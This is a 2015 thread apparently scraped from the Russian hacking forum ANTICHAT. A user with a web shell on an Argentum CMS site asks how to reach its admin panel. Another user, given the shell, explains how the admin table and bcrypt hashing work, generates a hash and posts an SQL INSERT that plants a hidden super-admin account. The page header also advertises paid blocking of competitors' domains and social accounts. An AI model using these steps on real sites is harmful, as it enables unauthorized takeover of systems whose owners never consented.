УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Argentum CMS

Опции темы

Поиск в этой теме

Опции просмотра

08.06.2015, 21:36

Unknowhacker

Участник форума

Регистрация: 25.05.2013

Сообщений: 249

Провел на форуме:
94006

Репутация: 24

В общем есть шелл на данном типе движка доступ к зарегистрированным пользователям. Но данные под панель администрирования не подходят. И собственно вопрос, где хранятся данные админ пользователей данного движка?

08.06.2015, 22:22

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

Провел на форуме:
1066435

Репутация: 1013

это просто студия, которая клепает сайты. http://argentum.ua/ru/portfolio

если нет в базе, значит лежат где-нибудь в файле

09.06.2015, 15:28

Unknowhacker

Участник форума

Регистрация: 25.05.2013

Сообщений: 249

Провел на форуме:
94006

Репутация: 24

Я встречал на многих сайтах, что данные админа как правило находились в скрипте панели администрирования.

Вот я зашёл сюда /.../cpanel

А дальше где искать, уже все тут конфиги перерыл. Народ, подскажите!

P.S Данные db_user - не подходят!

09.06.2015, 15:34

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

Провел на форуме:
1066435

Репутация: 1013

Цитата:

Сообщение от Unknowhacker

↑
Я встречал на многих сайтах, что данные админа как правило находились в скрипте панели администрирования.
Вот я зашёл сюда
/.../cpanel

А дальше где искать, уже все тут конфиги перерыл. Народ, подскажите!
P.S
Данные db_user - не подходят!

шелл в лс

09.06.2015, 16:52

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

Провел на форуме:
1066435

Репутация: 1013

я сначала начал искать по файлам всяческими find и grep, а потом все же решил перепроверить.

есть там такая таблица: sf_admin_user, в ней такие колонки:

Код:

id    group_id    username    password    full_name    email    created_at    last_activity    is_active    is_super_admin

так вот в cpanel пускает, если is_super_admin = 1.

пароли там через функцию http://php.net/manual/ru/function.password-hash.php

ищем файл:

Код:

grep --exclude=*.o -rnw '/var/www/***/' -e "PASSWORD_BCRYPT"
/var/www/***/plugins/sfArgentumCMSPlugin/lib/password.php:12:    define('PASSWORD_BCRYPT', 1);
/var/www/***/plugins/sfArgentumCMSPlugin/lib/password.php:13:    define('PASSWORD_DEFAULT', PASSWORD_BCRYPT);
/var/www/***/plugins/sfArgentumCMSPlugin/lib/password.php:38:            case PASSWORD_BCRYPT:
/var/www/***/plugins/sfArgentumCMSPlugin/lib/password.php:159:            $return['algo'] = PASSWORD_BCRYPT;
/var/www/***/plugins/sfArgentumCMSPlugin/lib/password.php:184:            case PASSWORD_BCRYPT:

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]switch ([/COLOR][COLOR="#0000BB"]$algo[/COLOR][COLOR="#007700"]) {
            case[/COLOR][COLOR="#0000BB"]PASSWORD_BCRYPT[/COLOR][COLOR="#007700"]:
[/COLOR][COLOR="#0000BB"]$cost[/COLOR][COLOR="#007700"]= isset([/COLOR][COLOR="#0000BB"]$options[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'cost'[/COLOR][COLOR="#007700"]]) ?[/COLOR][COLOR="#0000BB"]$options[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'cost'[/COLOR][COLOR="#007700"]] :[/COLOR][COLOR="#0000BB"]10[/COLOR][COLOR="#007700"];
                if ([/COLOR][COLOR="#0000BB"]$cost[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#0000BB"]$info[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'options'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'cost'[/COLOR][COLOR="#007700"]]) {
                    return[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"];[/COLOR][/COLOR]

bcrypt, cost = 10

генерируем пасс себе

Код:

 10,
];
echo password_hash("pass", PASSWORD_BCRYPT, $options)."\n";
?>

$2a$10$Fnz2ze0gI7SYofxsluTrluK3GEQiFGS2Oy4kEbBo816 yEvRWHFGKS

добавим себя в базу:

Код:

INSERT INTO sf_admin_user (id, group_id, username, password, full_name, email, created_at, last_activity, is_active, is_super_admin) VALUES (667, 1, "antichat1", "$2a$10$Fnz2ze0gI7SYofxsluTrluK3GEQiFGS2Oy4kEbBo816yEvRWHFGKS", "lol1", "lol@lol.ru1", "2010-10-10 17:29:54", "2013-04-05 22:05:38", 1, 1);

готово, логинимся: ***/cpanel/

10.06.2015, 02:04

Unknowhacker

Участник форума

Регистрация: 25.05.2013

Сообщений: 249

Провел на форуме:
94006

Репутация: 24

Что-то я не понял, я создал пхп-скрипт ввёл код.

Код:

 10,
];
echo password_hash("pass", PASSWORD_BCRYPT, $options)."\n";
?>

Сохраняю, обновляю страницу - белый экран. (Кодировка UTF-8)

10.06.2015, 02:20

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

Провел на форуме:
1066435

Репутация: 1013

Цитата:

Сообщение от Unknowhacker

↑
Что-то я не понял, я создал пхп-скрипт ввёл код.

Код:

 10,
];
echo password_hash("pass", PASSWORD_BCRYPT, $options)."\n";
?>

Сохраняю, обновляю страницу - белый экран. (Кодировка UTF-8)

https://www.dailycred.com/article/bcrypt-calculator

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход